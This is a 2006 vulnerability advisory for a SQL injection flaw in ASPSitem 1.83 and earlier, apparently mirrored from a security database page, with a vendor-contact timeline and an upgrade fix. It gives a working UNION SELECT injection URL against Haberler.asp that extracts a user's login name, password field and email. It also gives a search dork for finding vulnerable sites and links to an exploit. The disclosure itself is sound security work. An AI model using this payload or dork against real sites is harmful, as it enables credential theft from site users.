Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12332
HistoryApr 20, 2006 - 12:00 a.m.

ASPSitem <= 1.83 Remote SQL Injection Vulnerability

2006-04-2000:00:00
vulners.com
14

โ€“Security Reportโ€“
Advisory: ASPSitem <= 1.83 Remote SQL Injection Vulnerability.

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 19/04/06 19:33 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: ASPSitem (http://www.aspsitem.com)
Version: 1.83 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to id
parameter in Haberler.asp
Level: Critical
Solution: Upgrade your ASPSitem version to 2.0

How&Example:
GET -> http://[victim]/[ASPSitemDir]/Haberler.asp?haber=devam&id=[SQL]
EXAMPLE ->

http://[victim]/[ASPSitemDir]/Haberler.asp?haber=devam&id=-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,
kayittarih,email%20FROM%20uyeler%20where%20id%20like%201
with this example remote attacker can leak userid 1's login information from
database.

Timeline:

  • 19/04/2006: Vulnerability found.
  • 19/04/2006: Contacted with vendor and waiting reply.

Exploit:
http://www.nukedx.com/?getxpl=23

Dorks: "TeัŽekkัŒr ASPSitem"

Original advisory can be found at: http://www.nukedx.com/?viewdoc=23